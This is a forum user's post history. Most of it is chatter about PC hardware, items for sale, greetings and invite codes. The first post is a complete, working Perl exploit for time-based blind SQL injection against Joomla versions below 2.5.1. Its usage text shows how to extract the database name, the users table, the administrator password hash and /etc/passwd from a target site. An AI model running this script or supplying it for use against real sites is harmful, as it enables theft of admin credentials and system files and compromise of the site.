Posts posted by LLegoLLaS
-
-
File:
#!/usr/bin/perl
# Thu Mar 15 22:55:32 CET 2012 A. Ramos <aramosf()unsec.net> # www.securitybydefault.com
# Joomla <2.5.1 time based sql injection - vuln by Colin Wong
#
# using sleep() and not benchmark(), change for < mysql 5.0.12
#
# 1.- Database name: database()
# 2.- Users data table name: (change 'joomla' for database() result)
# select table_name from information_schema.tables where table_schema = "joomla" and table_name like "%_users"
# 3.- Admin password: (change zzz_users from previous sql query result)
# select password from zzzz_users limit 1
use strict;
use LWP::UserAgent;
$| = 1;
my $url = $ARGV[0];
my $wtime = $ARGV[1];
my $sql = $ARGV[2];
unless ($ARGV[2]) {
    print "$0 <url> <wait time> <sql>\n";
    print "\texamples:\n";
    print "\t get admin password:\n";
    print "\t\t$0 http://host/joomla/ 3 'database()'\n";
    print "\t\t$0 http://host/joomla/ 3 'select table_name from information_schema.tables where table_schema=\"joomla\" and table_name like \"%25_users\"\'\n";
    print "\t\t$0 http://host/joomla/ 3 'select password from zzzz_users limit 1'\n";
    print "\t get file /etc/passwd\n";
    print "\t\t$0 http://host/joomla/ 3 'load_file(\"/etc/passwd\")'\n";
    exit 1;
}
my ($len,$sqldata);
my $ua = LWP::UserAgent->new;
$ua->timeout(60);
$ua->env_proxy;
my $stime = time();
my $res = $ua->get($url);
my $etime = time();
my $regrtt = $etime - $stime;
print "rtt: $regrtt secs\n";
print "vuln?: ";
my $sleep = $regrtt + $wtime;
$stime = time();
$res = $ua->get($url."/index.php/404' union select sleep($sleep) union select '1");
$etime = time();
my $rtt = $etime - $stime;
if ($rtt >= $regrtt + $wtime) { print "ok!\n"; } else { print "nope \n"; exit 1; }
my $lenoflen;
sub len {
    # length of length
    for (1..5) {
        my $sql=$_[0];
        $stime = time();
        $res = $ua->get($url."/index.php/404' union select if(length(length(($sql)))=$_,sleep($wtime),null) union select '1");
        $etime = time();
        my $rtt = $etime - $stime;
        if ($rtt >= $regrtt + $wtime) {
            $lenoflen = $_;
            last;
        }
    }
    for (1..$lenoflen) {
        my $ll;
        $ll=$_;
        for (0..9) {
            my $sql=$_[0];
            $stime = time();
            $res = $ua->get($url."/index.php/404' union select if(mid(length(($sql)),$ll,1)=$_,sleep($wtime),null) union select '1");
            $etime = time();
            my $rtt = $etime - $stime;
            if ($rtt >= $regrtt + $wtime) {
                $len .= $_;
            }
        }
    }
    return $len;
}
sub data {
    my $sql = $_[0];
    my $len = $_[1];
    my ($bit, $str, @byte);
    my $high = 128;
    for (1..$len) {
        my $c=8;
        @byte="";
        my $a=$_;
        for ($bit=1;$bit<=$high;$bit*=2) {
            $stime = time();
            # select if((ord(mid((load_file("/etc/passwd")),1,1)) & 64)=0,sleep(2),null) union select '1';
            $res = $ua->get($url."/index.php/404' union select if((ord(mid(($sql),$a,1)) & $bit)=0,sleep($wtime),null) union select '1");
            $etime = time();
            my $rtt = $etime - $stime;
            if ($rtt >= $regrtt + $wtime) {
                $byte[$c]="0";
            } else { $byte[$c]="1"; }
            $c--;
        }
        $str = join("",@byte);
        print pack("B*","$str");
    }
}
$len = len($sql);
print "$sql length: $len\n";
print "$sql data:\n\n";
data($sql,$len);
Source: BugSearch
-
I was actually wondering whether alonia still exists. We'll probably work together in the future, so I can see how the Romanians are doing on service quality these days.
-
Neither Shazam nor Tunatic recognizes it.
PS: does anyone know this one? Keygen song by Mall Vollio on SoundCloud - Create, record and share your sounds for free
-
It is being withdrawn from sale for good. Close topic
-
It will work, but you didn't choose your components well. Corsair 1600MHz is more than enough. Instead, I'd say put more into the processor (at least a 2300, if not a 2400), and for the motherboard I'd say go with a P67 or Z68 chipset.
-
If you subtract what you mentioned and leave only 4GB of RAM = ~21 million.
That's 30 million there including the hard drive (using the last price from when it was available, i.e. somewhere around 380 lei).
PS: I recommend getting most of them from emag. The wishlist is on pcgarage because emag's site is clunky.
-
It depends on the budget. I have a Core i5 2400 (800 lei), but it can't be overclocked. If you want OC, I warmly recommend the i5 2500k.
Both are socket 1155.
PS: I recommend this system: "Balanced system" - wishlist by Cipry N. (my current configuration)
-
Off-topic: I'm taking up sewing.
Am I the only one who finds this WRONG?
On-topic: what can I say... good luck with the sale.
-
Now a question for those who spend most of their time/work on Linux:
Could you stay on Windows now, with PowerShell being similar to a Linux shell (in terms of commands)?
A few commands alone don't bring Windows to the same level as Linux.
Apples/pears.
-
That's what happens when you open every exe you come across.
-
Selling a black Microsoft Arc Touch. Used for one week. 2-year manufacturer warranty, complete box.
Will trade for a dual-SIM Nokia or 32GB USB sticks (Kingston DTR500 or equivalent). Price negotiable. For trades the value is higher.
I reserve the right to refuse an offer and/or to refuse based on the number/quality of your posts on the forum. I will post pictures soon as well.
-
Welcome! Decide on a field that helps you/that you like and try to go as deep as you can into what you set out to do.
-
Why all the panic? Other sites hosted there weren't working either (fl, telefonultau, etc.). Maintenance!
-
It's good. Thanks.
-
Do you have lfs.net / lfsforum.net / lfsworld.net? Thanks!
-
5 codes:
bY7vdznOU0dnVEAzbbqbm673QtaUboqNYYnIdLyOQ6xnaK5xS5dvWzprb6x/mzk2YbyvdL9+V+anap7rX5RiQ542V+dsV6N0YbxDdoMGW+qsazwLSad7m4McU+a5VYprSKnRma5N/Kp4ay72/oRbdbacRbxnR=/rSaBieba=Qc5cRp7uSK7IV6ncIbMnazN0bbyLdE7oaYRnmsAwbsnie6RrXtR5RKpDY65adypcYthsXoDyY=R8bbp3UEBsV=/qYsn8nEaN/j7sm0h0S4dXe67NI+qBbEnMSsninaq+V+q4RpGzSyB8n6nYacdRaLMwSLB8n=yoX55UV6dMY5WymEQ2Rta4VaSxYLdumEpS/+pCV5/N/byPmbRSbtqURo/u
Basescu e Tripat
Those of you who used them, post and/or leave a like.
-
This has been discussed before. In some cases people come back with an update on something, which is allowed. Besides, there are rules against those who do this (useless posts and topic reviving), and they risk a ban.
-
On torrent addresses? More specifically?
On-topic: how about an introduction or something?
-
You're scaring the guy.
Welcome. Do you have any skills?
-
But it could also be a ban for a week or a few days, not necessarily permanent. I'm in favor.
Russian roulette
-
Happy birthday, man! Happy birthday... to me!
-
Only over the top with unidirectional antennas (no obstacles), and even then I don't think it's possible over such a long distance.
-
You didn't break anything. No sites, nothing. Stay chill.
-
PM me your email.
Later edit: my bad. I sent you a PM with the invite code.
Later edit 2: both of you only have posts in the requests section. If you don't use the code within the next 15 minutes, I'll delete it.
Yellow :]
in Welcome
Posted · Edited by LLegoLLaS
How enthusiastic he is and how cool he thinks he is. Fuck's sake... I wish you luck, but...
PS: does anyone in your building know you?... there's something odd about your attitude.
''I got a song dedication'' - may my enemies die